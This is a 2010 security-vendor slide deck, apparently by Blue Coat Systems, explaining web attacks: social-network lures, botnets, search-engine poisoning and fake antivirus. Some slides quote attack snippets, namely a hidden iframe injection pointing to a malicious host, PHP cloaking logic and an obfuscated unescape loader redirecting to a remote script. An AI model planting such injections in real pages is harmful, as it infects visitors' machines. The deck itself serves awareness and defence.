Weitere ähnliche Inhalte
Ähnlich wie 2010-11 The Anatomy of a Web Attack (20)
Mehr von Raleigh ISSA (20)
Kürzlich hochgeladen (20)
2010-11 The Anatomy of a Web Attack
- 1. The Anatomy of a Web Attack
Dennis Pike
Systems Engineer
Geo Specialists Lead – Americas Security
dennis.pike@bluecoat.com
Blue Coat Systems Confidential
Blue Coat and the Blue Coat logo are trademarks of Blue Coat Systems, Inc., and may be registered
in certain jurisdictions. All other product or service names are the property of their respective owners.
© Blue Coat Systems, Inc. 2010. All Rights Reserved.
- 2. Agenda
State of the Web
• Top categories
• Top attacks
The Anatomy of a Web Attack
• Lures to web threats
• Examples
Dynamic Link Analysis
2 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
- 3. Best of the Worst
Top Web Category?
>> Among the top ten active categories of 2009, social networking access
accounted for 25 percent of all Web access activity
Top Web threat?
>> Fake Antivirus was the most successful Web threat in 2009, followed by
the Fake Video Codec offer.
>>New Fake AV installer programs increased from an average of 300 to
1,462 per day in the second half of 2009. *
>>Average lifetime of sites that redirect users to Web pages that try to
install scareware decreased with a median lifetime dropping below 100
hours around April 2009, below 10 hours around September 2009, and
below one hour since January 2010. *
*Google Inc.
3 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
- 4. Email vs Social Networking
Do more people use email or social networking sites?
>> According to Nielsen Co., in August 2009, 277 million people used email
across the U.S., several European countries, Brazil and Australia, a 21 percent
increase from the year before. But the number of users on social networking
and other community sites jumped 31 percent to 302 million, bypassing the
email user population by 10 percent.
4 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
- 5. Domain: Client% Domain: Client%
Noteworthy Items ~Total~:
youtube.com:
100%
35.7800
~Total~:
youtube.com:
100.00%
36.28
hotfile.com: 7.427 rapidshare.com: 6.36
Argument for Video (HTTP and Streaming)
apple.com: 4.901 hotfile.com: 5.26
ninjacloak.com: 4.205 apple.com: 3.98
rapidshare.com: 4.135 ninjacloak.com: 3.97
megaupload.com: 2.977 megaupload.com: 2.54
googlevideo.com: 2.66 googlevideo.com: 2.33
fbcdn.net: 1.791 fbcdn.net: 1.85
mediafire.com: 1.492 fileserve.com: 1.75
windowsupdate.com: 1.305 playstation.net: 1.74
playstation.net: 1.241 mediafire.com: 1.68
fileserve.com: 1.187 windowsupdate.com: 1.42
4shared.com: 1.031 zshare.net: 0.78
zshare.net: 0.7793 facebook.com: 0.65
dailymotion.com: 0.6476 dailymotion.com: 0.62
google.com: 0.588 4shared.com: 0.6
facebook.com: 0.5764 novamov.com: 0.54
novamov.com: 0.5737 google.com: 0.54
microsoft.com: 0.4747 farmville.com: 0.52
farmville.com: 0.4626 adobe.com: 0.41
video
filesharing
© Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
- 6. Changing Web Habits
Top 10 Categories – 2009 Social Networking
WebFilter/WebPulse, 62M+ Users
Moved to #1 from #2 position
1. Social Networking Represents 25% of Top10 requests
2. Web Advertisements
3. Search Engines/Portals Web Email
4. Personals/Dating Dropped to #9 from #5 position
5. Pornography Users migrating to social networking
6. Computers/Internet
7. Audio/Video Clips
8. Adult/Mature Content Cyber Crime Leverages
9. Web Email Search engine poisoning
10. Illegal/Questionable Fake AV and Codec updates
Popular site injections
Death, Drama & Disaster lures
Health & Wealth scams
6 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
- 7. Web Threats Rising Exponentially
2/3 of all known malicious code threats in 1 year (Symantec April’09)
1 in 150 Webpages infected in 2009 vs. 1 in 20,000 in 2006 (Kaspersky)
7 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
- 8. Distribution Power
Botnet computing power to:
Pitch worthless products
Hijack online banking accounts Top 5
Steal corporate data Botnets
in 2009
Botnet Zeus Koobface B Koobface D Monkif A Clickbot
Peak 1,070,000
number 812,000
599,000
of active 506,000
bots 375,000
How it
spreads
Search Results
Facebook Twitter
Social
Networking
USA TODAY Research – March 2010
8 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
- 9. An Invitation to Crime
2 – Program messages
user’s friends asking 3 – Anyone who clicks
them to click on a link on the link is asked to
to a photo or video. enable a media player
needed to see the
images. Running the
file turns the PC into
1 – An automated a bot.
program logs on
to social network
using stolen user
4 – The bot steals the PC
credentials.
owners logon credentials,
starting the cycle again.
USA TODAY Research – March 2010
9 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
- 10. Web Evolution
Static Pages Dynamic Pages
Dynamic Pages Interactive Pages
Publishing Model Community Model
Single Host Pages Multi-Host Pages
Nice to Have Must Have
10 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
- 11. Multi-Host Pages
SPORT
6 Domains
13 Hosts
147 Requests
504 KB
14.5 Seconds
11 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
- 12. Paths to Malware Infection
Link Farms
Infected Site Search Engine
Blogs, Forums
Relay Bait
Malware
12 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
- 13. End User…Infected Site
www.inka.com
<html>
…
<iframesrc="http://ho
menameregistration.
cn/in.cgi?income12"
width=1 height=1
style="visibility: homenameregistration.cn/in.cgi?income12
hidden"></iframe><d
iv id=“header”>
…
</html>
13 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
- 14. Web 2.0 and Search Engines
Forums
Blogs Search
Wikis WWW Engine
View
Guestbooks
14 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
- 15. Web 2.0 and Search Engines
Links…
Links…
Links…
Links…
Links…
Links… Search
WWW Engine
Words… View
Words…
Words…
Links…
Links…
Links…
15 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
- 16. 16 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
- 17. 17 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
- 18. Hijacked Website
if (“search engine”) {
xdesignstudios.com
echo “…indexable content…”
} else {
echo “<body><script src="live.js"></script>”
dir1 }
index.php
…
id=fall+printable+coloring+pages
id=free+printable+easter+drawings
id=disney+printable+cartoon+characters
id=free+printable+halloween+sheets
id=girls+free+printable+organizer
id=in+store+printable+catherines+coupons
…
live.js
18 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
- 19. End User…Search Engine Redirect
index.php?id=hannah-montana-printable-birthday-invitations
<body>
<script src="live.js">
</script>
document.write(unes live.js
cape('%3C%53%43
%52%49%50%54%
20%20%20%20%6C
%61%6E%67%75…
http://cracksinside.com/red/gen.js
19 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
- 20. What just happened?
Links…
Links…
Links…
Links…
Links…
Links… Search
WWW Engine
Words… View
Words…
Words…
Links…
Links…
Links… Redirect
20 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
- 21. Recent Examples - VBMania
www.sharedocuments.com/library/PDF_Document21.025542010.pdf
Email text
www.sharedocument
s.com/library/PDF_D
ocument21.0255420
10.pdf
members.multimania.co.uk/yahoophoto/PDF_Document21_025542010_pdf.scr
21 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
- 22. Recent Examples – Fake Warez
22 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
- 23. © Blue Coat Systems, Inc. 2010. All Rights Reserved.